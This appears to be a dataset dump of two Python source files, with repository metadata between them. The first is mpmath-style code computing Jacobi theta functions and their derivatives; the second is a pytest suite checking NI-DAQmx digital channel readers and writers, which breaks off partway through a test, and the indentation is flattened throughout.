c1 = ctx.to_fixed(c1, wp)
s1 = ctx.to_fixed(s1, wp)
cn = c1
sn = s1
if (nd&1):
sre = (are * sn) >> wp
sim = (aim * sn) >> wp
else:
sre = (are * cn) >> wp
sim = (aim * cn) >> wp
n = 2
while are**2 + aim**2 > MIN:
bre, bim = (bre * x2re - bim * x2im) >> wp, \
(bre * x2im + bim * x2re) >> wp
are, aim = (are * bre - aim * bim) >> wp, \
(are * bim + aim * bre) >> wp
cn, sn = (cn*c1 - sn*s1) >> wp, (sn*c1 + cn*s1) >> wp
if nd&1:
sre += (are * sn * n**nd) >> wp
sim += (aim * sn * n**nd) >> wp
else:
sre += (are * cn * n**nd) >> wp
sim += (aim * cn * n**nd) >> wp
n += 1
sre = -(sre << (nd+1))
sim = -(sim << (nd+1))
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
#case z complex, q real
elif not ctx._im(q):
wp = ctx.prec + extra2
x = ctx.to_fixed(ctx._re(q), wp)
a = b = x
x2 = (x*x) >> wp
prec0 = ctx.prec
ctx.prec = wp
c1, s1 = ctx.cos_sin(2*z)
ctx.prec = prec0
cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
if (nd&1):
sre = (a * snre) >> wp
sim = (a * snim) >> wp
else:
sre = (a * cnre) >> wp
sim = (a * cnim) >> wp
n = 2
while abs(a) > MIN:
b = (b*x2) >> wp
a = (a*b) >> wp
t1 = (cnre*c1re - cnim*c1im - snre*s1re + snim*s1im) >> wp
t2 = (cnre*c1im + cnim*c1re - snre*s1im - snim*s1re) >> wp
t3 = (snre*c1re - snim*c1im + cnre*s1re - cnim*s1im) >> wp
t4 = (snre*c1im + snim*c1re + cnre*s1im + cnim*s1re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
if (nd&1):
sre += (a * snre * n**nd) >> wp
sim += (a * snim * n**nd) >> wp
else:
sre += (a * cnre * n**nd) >> wp
sim += (a * cnim * n**nd) >> wp
n += 1
sre = -(sre << (nd+1))
sim = -(sim << (nd+1))
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
# case z and q complex
else:
wp = ctx.prec + extra2
xre = ctx.to_fixed(ctx._re(q), wp)
xim = ctx.to_fixed(ctx._im(q), wp)
x2re = (xre*xre - xim*xim) >> wp
x2im = (xre*xim) >> (wp - 1)
are = bre = xre
aim = bim = xim
prec0 = ctx.prec
ctx.prec = wp
# cos(2*z), sin(2*z) with z complex
c1, s1 = ctx.cos_sin(2*z)
ctx.prec = prec0
cnre = c1re = ctx.to_fixed(ctx._re(c1), wp)
cnim = c1im = ctx.to_fixed(ctx._im(c1), wp)
snre = s1re = ctx.to_fixed(ctx._re(s1), wp)
snim = s1im = ctx.to_fixed(ctx._im(s1), wp)
if (nd&1):
sre = (are * snre - aim * snim) >> wp
sim = (aim * snre + are * snim) >> wp
else:
sre = (are * cnre - aim * cnim) >> wp
sim = (aim * cnre + are * cnim) >> wp
n = 2
while are**2 + aim**2 > MIN:
bre, bim = (bre * x2re - bim * x2im) >> wp, \
(bre * x2im + bim * x2re) >> wp
are, aim = (are * bre - aim * bim) >> wp, \
(are * bim + aim * bre) >> wp
t1 = (cnre*c1re - cnim*c1im - snre*s1re + snim*s1im) >> wp
t2 = (cnre*c1im + cnim*c1re - snre*s1im - snim*s1re) >> wp
t3 = (snre*c1re - snim*c1im + cnre*s1re - cnim*s1im) >> wp
t4 = (snre*c1im + snim*c1re + cnre*s1im + cnim*s1re) >> wp
cnre = t1
cnim = t2
snre = t3
snim = t4
if(nd&1):
sre += ((are * snre - aim * snim) * n**nd) >> wp
sim += ((aim * snre + are * snim) * n**nd) >> wp
else:
sre += ((are * cnre - aim * cnim) * n**nd) >> wp
sim += ((aim * cnre + are * cnim) * n**nd) >> wp
n += 1
sre = -(sre << (nd+1))
sim = -(sim << (nd+1))
sre = ctx.ldexp(sre, -wp)
sim = ctx.ldexp(sim, -wp)
s = ctx.mpc(sre, sim)
if (nd&1):
return (-1)**(nd//2) * s
else:
return (-1)**(1 + nd//2) * s
@defun
def _jacobi_theta2a(ctx, z, q):
"""
case ctx._im(z) != 0
theta(2, z, q) =
q**1/4 * Sum(q**(n*n + n) * exp(j*(2*n + 1)*z), n=-inf, inf)
max term for minimum (2*n+1)*log(q).real - 2* ctx._im(z)
n0 = int(ctx._im(z)/log(q).real - 1/2)
theta(2, z, q) =
q**1/4 * Sum(q**(n*n + n) * exp(j*(2*n + 1)*z), n=n0, inf) +
q**1/4 * Sum(q**(n*n + n) * exp(j*(2*n + 1)*z), n, n0-1, -inf)
"""
n = n0 = int(ctx._im(z)/ctx._re(ctx.log(q)) - 1/2)
e2 = ctx.expj(2*z)
e = e0 = ctx.expj((2*n+1)*z)
a = q**(n*n + n)
# leading term
term = a * e
s = term
eps1 = ctx.eps*abs(term)
while 1:
n += 1
e = e * e2
term = q**(n*n + n) * e
if abs(term) < eps1:
break
s += term
e = e0
e2 = ctx.expj(-2*z)
n = n0
while 1:
n -= 1
e = e * e2
term = q**(n*n + n) * e
if abs(term) < eps1:
break
s += term
s = s * ctx.nthroot(q, 4)
return s
@defun
def _jacobi_theta3a(ctx, z, q):
"""
case ctx._im(z) != 0
theta3(z, q) = Sum(q**(n*n) * exp(j*2*n*z), n, -inf, inf)
max term for n*abs(log(q).real) + ctx._im(z) ~= 0
n0 = int(- ctx._im(z)/abs(log(q).real))
"""
n = n0 = int(-ctx._im(z)/abs(ctx._re(ctx.log(q))))
e2 = ctx.expj(2*z)
e = e0 = ctx.expj(2*n*z)
s = term = q**(n*n) * e
eps1 = ctx.eps*abs(term)
while 1:
n += 1
e = e * e2
term = q**(n*n) * e
if abs(term) < eps1:
break
s += term
e = e0
e2 = ctx.expj(-2*z)
n = n0
while 1:
n -= 1
e = e * e2
term = q**(n*n) * e
if abs(term) < eps1:
break
s += term
return s
@defun
def _djacobi_theta2a(ctx, z, q, nd):
"""
case ctx._im(z) != 0
dtheta(2, z, q, nd) =
j* q**1/4 * Sum(q**(n*n + n) * (2*n+1)*exp(j*(2*n + 1)*z), n=-inf, inf)
max term for (2*n0+1)*log(q).real - 2* ctx._im(z) ~= 0
n0 = int(ctx._im(z)/log(q).real - 1/2)
"""
n = n0 = int(ctx._im(z)/ctx._re(ctx.log(q)) - 1/2)
e2 = ctx.expj(2*z)
e = e0 = ctx.expj((2*n + 1)*z)
a = q**(n*n + n)
# leading term
term = (2*n+1)**nd * a * e
s = term
eps1 = ctx.eps*abs(term)
while 1:
n += 1
e = e * e2
term = (2*n+1)**nd * q**(n*n + n) * e
if abs(term) < eps1:
break
s += term
e = e0
e2 = ctx.expj(-2*z)
n = n0
while 1:
n -= 1
e = e * e2
term = (2*n+1)**nd * q**(n*n + n) * e
if abs(term) < eps1:
break
s += term
return ctx.j**nd * s * ctx.nthroot(q, 4)
@defun
def _djacobi_theta3a(ctx, z, q, nd):
"""
case ctx._im(z) != 0
djtheta3(z, q, nd) = (2*j)**nd *
Sum(q**(n*n) * n**nd * exp(j*2*n*z), n, -inf, inf)
max term for minimum n*abs(log(q).real) + ctx._im(z)
"""
n = n0 = int(-ctx._im(z)/abs(ctx._re(ctx.log(q))))
e2 = ctx.expj(2*z)
e = e0 = ctx.expj(2*n*z)
a = q**(n*n) * e
s = term = n**nd * a
if n != 0:
eps1 = ctx.eps*abs(term)
else:
eps1 = ctx.eps*abs(a)
while 1:
n += 1
e = e * e2
a = q**(n*n) * e
term = n**nd * a
if n != 0:
aterm = abs(term)
else:
aterm = abs(a)
if aterm < eps1:
break
s += term
e = e0
e2 = ctx.expj(-2*z)
n = n0
while 1:
n -= 1
e = e * e2
a = q**(n*n) * e
term = n**nd * a
if n != 0:
aterm = abs(term)
else:
aterm = abs(a)
if aterm < eps1:
break
s += term
return (2*ctx.j)**nd * s
@defun
def jtheta(ctx, n, z, q, derivative=0):
if derivative:
return ctx._djtheta(n, z, q, derivative)
z = ctx.convert(z)
q = ctx.convert(q)
# Implementation note
# If ctx._im(z) is close to zero, _jacobi_theta2 and _jacobi_theta3
# are used,
# which compute the series starting from n=0 using fixed precision
# numbers;
# otherwise _jacobi_theta2a and _jacobi_theta3a are used, which compute
# the series starting from n=n0, which is the largest term.
# TODO: write _jacobi_theta2a and _jacobi_theta3a using fixed-point
if abs(q) > ctx.THETA_Q_LIM:
raise ValueError('abs(q) > THETA_Q_LIM = %f' % ctx.THETA_Q_LIM)
extra = 10
if z:
M = ctx.mag(z)
if M > 5 or (n == 1 and M < -5):
extra += 2*abs(M)
cz = 0.5
extra2 = 50
prec0 = ctx.prec
try:
ctx.prec += extra
if n == 1:
if ctx._im(z):
if abs(ctx._im(z)) < cz * abs(ctx._re(ctx.log(q))):
ctx.dps += extra2
res = ctx._jacobi_theta2(z - ctx.pi/2, q)
else:
ctx.dps += 10
res = ctx._jacobi_theta2a(z - ctx.pi/2, q)
else:
res = ctx._jacobi_theta2(z - ctx.pi/2, q)
elif n == 2:
if ctx._im(z):
if abs(ctx._im(z)) < cz * abs(ctx._re(ctx.log(q))):
ctx.dps += extra2
res = ctx._jacobi_theta2(z, q)
else:
ctx.dps += 10
res = ctx._jacobi_theta2a(z, q)
else:
res = ctx._jacobi_theta2(z, q)
elif n == 3:
if ctx._im(z):
if abs(ctx._im(z)) < cz * abs(ctx._re(ctx.log(q))):
ctx.dps += extra2
res = ctx._jacobi_theta3(z, q)
else:
ctx.dps += 10
res = ctx._jacobi_theta3a(z, q)
else:
res = ctx._jacobi_theta3(z, q)
elif n == 4:
if ctx._im(z):
if abs(ctx._im(z)) < cz * abs(ctx._re(ctx.log(q))):
ctx.dps += extra2
res = ctx._jacobi_theta3(z, -q)
else:
ctx.dps += 10
res = ctx._jacobi_theta3a(z, -q)
else:
res = ctx._jacobi_theta3(z, -q)
else:
raise ValueError
finally:
ctx.prec = prec0
return res
@defun
def _djtheta(ctx, n, z, q, derivative=1):
z = ctx.convert(z)
q = ctx.convert(q)
nd = int(derivative)
if abs(q) > ctx.THETA_Q_LIM:
raise ValueError('abs(q) > THETA_Q_LIM = %f' % ctx.THETA_Q_LIM)
extra = 10 + ctx.prec * nd // 10
if z:
M = ctx.mag(z)
if M > 5 or (n != 1 and M < -5):
extra += 2*abs(M)
cz = 0.5
extra2 = 50
prec0 = ctx.prec
try:
ctx.prec += extra
if n == 1:
if ctx._im(z):
if abs(ctx._im(z)) < cz * abs(ctx._re(ctx.log(q))):
ctx.dps += extra2
res = ctx._djacobi_theta2(z - ctx.pi/2, q, nd)
else:
ctx.dps += 10
res = ctx._djacobi_theta2a(z - ctx.pi/2, q, nd)
else:
res = ctx._djacobi_theta2(z - ctx.pi/2, q, nd)
elif n == 2:
if ctx._im(z):
if abs(ctx._im(z)) < cz * abs(ctx._re(ctx.log(q))):
ctx.dps += extra2
res = ctx._djacobi_theta2(z, q, nd)
else:
ctx.dps += 10
res = ctx._djacobi_theta2a(z, q, nd)
else:
res = ctx._djacobi_theta2(z, q, nd)
elif n == 3:
if ctx._im(z):
if abs(ctx._im(z)) < cz * abs(ctx._re(ctx.log(q))):
ctx.dps += extra2
res = ctx._djacobi_theta3(z, q, nd)
else:
ctx.dps += 10
res = ctx._djacobi_theta3a(z, q, nd)
else:
res = ctx._djacobi_theta3(z, q, nd)
elif n == 4:
if ctx._im(z):
if abs(ctx._im(z)) < cz * abs(ctx._re(ctx.log(q))):
ctx.dps += extra2
res = ctx._djacobi_theta3(z, -q, nd)
else:
ctx.dps += 10
res = ctx._djacobi_theta3a(z, -q, nd)
else:
res = ctx._djacobi_theta3(z, -q, nd)
else:
raise ValueError
finally:
ctx.prec = prec0
return +res
| 35.542857
| 76
| 0.395257
| 5,255
| 37,320
| 2.746717
| 0.03216
| 0.02702
| 0.054039
| 0.05584
| 0.940973
| 0.917348
| 0.905917
| 0.890813
| 0.87183
| 0.850215
| 0
| 0.059624
| 0.440943
| 37,320
| 1,049
| 77
| 35.57674
| 0.632189
| 0.059995
| 0
| 0.875519
| 0
| 0
| 0.001432
| 0
| 0
| 0
| 0
| 0.000953
| 0
| 1
| 0.010373
| false
| 0
| 0.001037
| 0
| 0.03112
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2b47ec80f342fb81468e7e85a013531bbc6bf26d
| 26,340
|
py
|
Python
|
nidaqmx/tests/test_stream_digital_readers_writers.py
|
stafak/nidaqmx-python
|
f354d7971b21074c120c6f298dbbf4a5e0e4f4f4
|
[
"MIT"
] | 252
|
2017-03-22T02:43:16.000Z
|
2022-03-27T14:44:44.000Z
|
nidaqmx/tests/test_stream_digital_readers_writers.py
|
stafak/nidaqmx-python
|
f354d7971b21074c120c6f298dbbf4a5e0e4f4f4
|
[
"MIT"
] | 133
|
2017-03-21T20:57:59.000Z
|
2022-03-31T16:08:12.000Z
|
nidaqmx/tests/test_stream_digital_readers_writers.py
|
stafak/nidaqmx-python
|
f354d7971b21074c120c6f298dbbf4a5e0e4f4f4
|
[
"MIT"
] | 124
|
2017-04-01T18:35:24.000Z
|
2022-03-25T06:30:00.000Z
|
import numpy
import pytest
import random
import time
import nidaqmx
from nidaqmx.constants import (
LineGrouping)
from nidaqmx.stream_readers import (
DigitalSingleChannelReader, DigitalMultiChannelReader)
from nidaqmx.stream_writers import (
DigitalSingleChannelWriter, DigitalMultiChannelWriter)
from nidaqmx.tests.fixtures import x_series_device
from nidaqmx.tests.helpers import generate_random_seed
from nidaqmx.tests.test_read_write import TestDAQmxIOBase
from nidaqmx.utils import flatten_channel_string
class TestDigitalSingleChannelReaderWriter(TestDAQmxIOBase):
"""
Contains a collection of pytest tests that validate the digital single
channel readers and writers in the NI-DAQmx Python API.
These tests use only a single X Series device by both writing to and
reading from ONLY the digital output lines.
"""
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_one_sample_one_line(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
do_line = random.choice(x_series_device.do_lines).name
with nidaqmx.Task() as task:
task.do_channels.add_do_chan(
do_line, line_grouping=LineGrouping.CHAN_PER_LINE)
writer = DigitalSingleChannelWriter(task.out_stream)
reader = DigitalSingleChannelReader(task.in_stream)
# Generate random values to test.
values_to_test = [bool(random.getrandbits(1)) for _ in range(10)]
values_read = []
for value_to_test in values_to_test:
writer.write_one_sample_one_line(value_to_test)
time.sleep(0.001)
values_read.append(reader.read_one_sample_one_line())
numpy.testing.assert_array_equal(values_read, values_to_test)
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_one_sample_multi_line(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
number_of_lines = random.randint(2, len(x_series_device.do_lines))
do_lines = random.sample(x_series_device.do_lines, number_of_lines)
with nidaqmx.Task() as task:
task.do_channels.add_do_chan(
flatten_channel_string([d.name for d in do_lines]),
line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
writer = DigitalSingleChannelWriter(task.out_stream)
reader = DigitalSingleChannelReader(task.in_stream)
# Generate random values to test.
values_to_test = numpy.array(
[bool(random.getrandbits(1)) for _ in
range(number_of_lines)])
writer.write_one_sample_multi_line(values_to_test)
time.sleep(0.001)
values_read = numpy.zeros(number_of_lines, dtype=numpy.bool)
reader.read_one_sample_multi_line(values_read)
numpy.testing.assert_array_equal(values_read, values_to_test)
@pytest.mark.skipif(
not any([d.do_port_width <= 8 for d in x_series_device().do_ports]),
reason="Requires digital port with at most 8 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_one_sample_port_byte(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
do_port = random.choice(
[d for d in x_series_device.do_ports if d.do_port_width <= 8])
with nidaqmx.Task() as task:
task.do_channels.add_do_chan(
do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = [int(random.getrandbits(do_port.do_port_width))
for _ in range(10)]
writer = DigitalSingleChannelWriter(task.out_stream)
reader = DigitalSingleChannelReader(task.in_stream)
values_read = []
for value_to_test in values_to_test:
writer.write_one_sample_port_byte(value_to_test)
time.sleep(0.001)
values_read.append(reader.read_one_sample_port_byte())
numpy.testing.assert_array_equal(values_read, values_to_test)
@pytest.mark.skipif(
not any([d.do_port_width <= 16 for d in x_series_device().do_ports]),
reason="Requires digital port with at most 16 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_one_sample_port_uint16(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
do_port = random.choice(
[do for do in x_series_device.do_ports if do.do_port_width <= 16])
with nidaqmx.Task() as task:
task.do_channels.add_do_chan(
do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = [int(random.getrandbits(do_port.do_port_width))
for _ in range(10)]
writer = DigitalSingleChannelWriter(task.out_stream)
reader = DigitalSingleChannelReader(task.in_stream)
values_read = []
for value_to_test in values_to_test:
writer.write_one_sample_port_uint16(value_to_test)
time.sleep(0.001)
values_read.append(reader.read_one_sample_port_uint16())
numpy.testing.assert_array_equal(values_read, values_to_test)
@pytest.mark.skipif(
not any([d.do_port_width <= 32 for d in x_series_device().do_ports]),
reason="Requires digital port with at most 32 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_one_sample_port_uint32(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
do_port = random.choice(
[do for do in x_series_device.do_ports if do.do_port_width <= 32])
with nidaqmx.Task() as task:
task.do_channels.add_do_chan(
do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = [int(random.getrandbits(do_port.do_port_width))
for _ in range(10)]
writer = DigitalSingleChannelWriter(task.out_stream)
reader = DigitalSingleChannelReader(task.in_stream)
values_read = []
for value_to_test in values_to_test:
writer.write_one_sample_port_uint32(value_to_test)
time.sleep(0.001)
values_read.append(reader.read_one_sample_port_uint32())
numpy.testing.assert_array_equal(values_read, values_to_test)
@pytest.mark.skipif(
not any([d.do_port_width <= 8 for d in x_series_device().do_ports]),
reason="Requires digital port with at most 8 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_many_sample_port_byte(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
number_of_samples = random.randint(2, 20)
do_port = random.choice(
[d for d in x_series_device.do_ports if d.do_port_width <= 8])
with nidaqmx.Task() as task:
task.do_channels.add_do_chan(
do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = numpy.array(
[int(random.getrandbits(do_port.do_port_width))
for _ in range(number_of_samples)], dtype=numpy.uint8)
writer = DigitalSingleChannelWriter(task.out_stream)
reader = DigitalSingleChannelReader(task.in_stream)
task.start()
writer.write_many_sample_port_byte(values_to_test)
time.sleep(0.001)
# Since we're writing to and reading from ONLY the digital
# output lines, we can't use sample clocks to correlate the
# read and write sampling times. Thus, we essentially read
# the last value written multiple times.
values_read = numpy.zeros(number_of_samples, dtype=numpy.uint8)
reader.read_many_sample_port_byte(
values_read, number_of_samples_per_channel=number_of_samples)
expected_values = [
values_to_test[-1] for _ in range(number_of_samples)]
numpy.testing.assert_array_equal(values_read, expected_values)
@pytest.mark.skipif(
not any([d.do_port_width <= 16 for d in x_series_device().do_ports]),
reason="Requires digital port with at most 16 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_many_sample_port_uint16(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
number_of_samples = random.randint(2, 20)
do_port = random.choice(
[d for d in x_series_device.do_ports if d.do_port_width <= 16])
with nidaqmx.Task() as task:
task.do_channels.add_do_chan(
do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = numpy.array(
[int(random.getrandbits(do_port.do_port_width))
for _ in range(number_of_samples)], dtype=numpy.uint16)
writer = DigitalSingleChannelWriter(task.out_stream)
reader = DigitalSingleChannelReader(task.in_stream)
task.start()
writer.write_many_sample_port_uint16(values_to_test)
time.sleep(0.001)
# Since we're writing to and reading from ONLY the digital
# output lines, we can't use sample clocks to correlate the
# read and write sampling times. Thus, we essentially read
# the last value written multiple times.
values_read = numpy.zeros(number_of_samples, dtype=numpy.uint16)
reader.read_many_sample_port_uint16(
values_read, number_of_samples_per_channel=number_of_samples)
expected_values = [
values_to_test[-1] for _ in range(number_of_samples)]
numpy.testing.assert_array_equal(values_read, expected_values)
@pytest.mark.skipif(
not any([d.do_port_width <= 32 for d in x_series_device().do_ports]),
reason="Requires digital port with at most 32 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_many_sample_port_uint32(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
number_of_samples = random.randint(2, 20)
do_port = random.choice(
[d for d in x_series_device.do_ports if d.do_port_width <= 32])
with nidaqmx.Task() as task:
task.do_channels.add_do_chan(
do_port.name, line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = numpy.array(
[int(random.getrandbits(do_port.do_port_width))
for _ in range(number_of_samples)], dtype=numpy.uint32)
writer = DigitalSingleChannelWriter(task.out_stream)
reader = DigitalSingleChannelReader(task.in_stream)
task.start()
writer.write_many_sample_port_uint32(values_to_test)
time.sleep(0.001)
# Since we're writing to and reading from ONLY the digital
# output lines, we can't use sample clocks to correlate the
# read and write sampling times. Thus, we essentially read
# the last value written multiple times.
values_read = numpy.zeros(number_of_samples, dtype=numpy.uint32)
reader.read_many_sample_port_uint32(
values_read, number_of_samples_per_channel=number_of_samples)
expected_values = [
values_to_test[-1] for _ in range(number_of_samples)]
numpy.testing.assert_array_equal(values_read, expected_values)
class TestDigitalMultiChannelReaderWriter(TestDAQmxIOBase):
"""
Contains a collection of pytest tests that validate the digital multi
channel readers and writers in the NI-DAQmx Python API.
These tests use only a single X Series device by utilizing the internal
loopback routes on the device.
"""
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_one_sample_one_line(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
number_of_channels = random.randint(2, len(x_series_device.do_lines))
do_lines = random.sample(x_series_device.do_lines, number_of_channels)
with nidaqmx.Task() as task:
task.do_channels.add_do_chan(
flatten_channel_string([d.name for d in do_lines]),
line_grouping=LineGrouping.CHAN_PER_LINE)
writer = DigitalMultiChannelWriter(task.out_stream)
reader = DigitalMultiChannelReader(task.in_stream)
# Generate random values to test.
values_to_test = numpy.array(
[bool(random.getrandbits(1)) for _ in
range(number_of_channels)])
writer.write_one_sample_one_line(values_to_test)
time.sleep(0.001)
values_read = numpy.zeros(number_of_channels, dtype=numpy.bool)
reader.read_one_sample_one_line(values_read)
numpy.testing.assert_array_equal(values_read, values_to_test)
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_one_sample_multi_line(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
num_lines = random.randint(2, 4)
number_of_channels = random.randint(
2, numpy.floor(len(x_series_device.do_lines) /
float(num_lines)))
all_lines = random.sample(x_series_device.do_lines,
num_lines * number_of_channels)
with nidaqmx.Task() as task:
for i in range(number_of_channels):
do_lines = all_lines[i * num_lines:(i + 1) * num_lines]
task.do_channels.add_do_chan(
flatten_channel_string([d.name for d in do_lines]),
line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
writer = DigitalMultiChannelWriter(task.out_stream)
reader = DigitalMultiChannelReader(task.in_stream)
# Generate random values to test.
values_to_test = numpy.array(
[[bool(random.getrandbits(1)) for _ in range(num_lines)]
for _ in range(number_of_channels)])
writer.write_one_sample_multi_line(values_to_test)
time.sleep(0.001)
values_read = numpy.zeros(
(number_of_channels, num_lines), dtype=numpy.bool)
reader.read_one_sample_multi_line(values_read)
numpy.testing.assert_array_equal(values_read, values_to_test)
@pytest.mark.skipif(
len([d.do_port_width <= 8 for d in x_series_device().do_ports]) < 2,
reason="Requires 2 digital ports with at most 8 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_one_sample_port_byte(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
all_ports = [d for d in x_series_device.do_ports if
d.do_port_width <= 8]
number_of_channels = random.randint(2, len(all_ports))
do_ports = random.sample(all_ports, number_of_channels)
with nidaqmx.Task() as task:
for do_port in do_ports:
task.do_channels.add_do_chan(
do_port.name,
line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = numpy.array(
[int(random.getrandbits(d.do_port_width)) for d in do_ports],
dtype=numpy.uint8)
writer = DigitalMultiChannelWriter(task.out_stream)
reader = DigitalMultiChannelReader(task.in_stream)
writer.write_one_sample_port_byte(values_to_test)
time.sleep(0.001)
values_read = numpy.zeros(number_of_channels, dtype=numpy.uint8)
reader.read_one_sample_port_byte(values_read)
numpy.testing.assert_array_equal(values_read, values_to_test)
@pytest.mark.skipif(
len([d.do_port_width <= 16 for d in x_series_device().do_ports]) < 2,
reason="Requires 2 digital ports with at most 16 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_one_sample_port_uint16(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
all_ports = [d for d in x_series_device.do_ports if
d.do_port_width <= 16]
number_of_channels = random.randint(2, len(all_ports))
do_ports = random.sample(all_ports, number_of_channels)
with nidaqmx.Task() as task:
for do_port in do_ports:
task.do_channels.add_do_chan(
do_port.name,
line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = numpy.array(
[int(random.getrandbits(d.do_port_width)) for d in do_ports],
dtype=numpy.uint16)
writer = DigitalMultiChannelWriter(task.out_stream)
reader = DigitalMultiChannelReader(task.in_stream)
writer.write_one_sample_port_uint16(values_to_test)
time.sleep(0.001)
values_read = numpy.zeros(number_of_channels, dtype=numpy.uint16)
reader.read_one_sample_port_uint16(values_read)
numpy.testing.assert_array_equal(values_read, values_to_test)
@pytest.mark.skipif(
len([d.do_port_width <= 32 for d in x_series_device().do_ports]) < 2,
reason="Requires 2 digital ports with at most 32 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_one_sample_port_uint32(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
all_ports = [d for d in x_series_device.do_ports if
d.do_port_width <= 32]
number_of_channels = random.randint(2, len(all_ports))
do_ports = random.sample(all_ports, number_of_channels)
with nidaqmx.Task() as task:
for do_port in do_ports:
task.do_channels.add_do_chan(
do_port.name,
line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = numpy.array(
[int(random.getrandbits(d.do_port_width)) for d in do_ports],
dtype=numpy.uint32)
writer = DigitalMultiChannelWriter(task.out_stream)
reader = DigitalMultiChannelReader(task.in_stream)
writer.write_one_sample_port_uint32(values_to_test)
time.sleep(0.001)
values_read = numpy.zeros(number_of_channels, dtype=numpy.uint32)
reader.read_one_sample_port_uint32(values_read)
numpy.testing.assert_array_equal(values_read, values_to_test)
@pytest.mark.skipif(
len([d.do_port_width <= 8 for d in x_series_device().do_ports]) < 2,
reason="Requires 2 digital ports with at most 8 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_many_sample_port_byte(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
number_of_samples = random.randint(2, 20)
all_ports = [d for d in x_series_device.do_ports if
d.do_port_width <= 8]
number_of_channels = random.randint(2, len(all_ports))
do_ports = random.sample(all_ports, number_of_channels)
with nidaqmx.Task() as task:
for do_port in do_ports:
task.do_channels.add_do_chan(
do_port.name,
line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = numpy.array(
[[int(random.getrandbits(do_port.do_port_width))
for _ in range(number_of_samples)] for do_port in do_ports],
dtype=numpy.uint8)
writer = DigitalMultiChannelWriter(task.out_stream)
reader = DigitalMultiChannelReader(task.in_stream)
task.start()
writer.write_many_sample_port_byte(values_to_test)
time.sleep(0.001)
# Since we're writing to and reading from ONLY the digital
# output lines, we can't use sample clocks to correlate the
# read and write sampling times. Thus, we essentially read
# the last value written multiple times.
values_read = numpy.zeros(
(number_of_channels, number_of_samples), dtype=numpy.uint8)
reader.read_many_sample_port_byte(
values_read, number_of_samples_per_channel=number_of_samples)
expected_values = [
[values_to_test[i, -1] for _ in range(number_of_samples)]
for i in range(number_of_channels)]
numpy.testing.assert_array_equal(values_read, expected_values)
@pytest.mark.skipif(
len([d.do_port_width <= 16 for d in x_series_device().do_ports]) < 2,
reason="Requires 2 digital ports with at most 16 lines.")
@pytest.mark.parametrize('seed', [generate_random_seed()])
def test_many_sample_port_uint16(self, x_series_device, seed):
# Reset the pseudorandom number generator with seed.
random.seed(seed)
number_of_samples = random.randint(2, 20)
all_ports = [d for d in x_series_device.do_ports if
d.do_port_width <= 16]
number_of_channels = random.randint(2, len(all_ports))
do_ports = random.sample(all_ports, number_of_channels)
with nidaqmx.Task() as task:
for do_port in do_ports:
task.do_channels.add_do_chan(
do_port.name,
line_grouping=LineGrouping.CHAN_FOR_ALL_LINES)
# Generate random values to test.
values_to_test = numpy.array(
[[int(random.getrandbits(do_port.do_port_width))
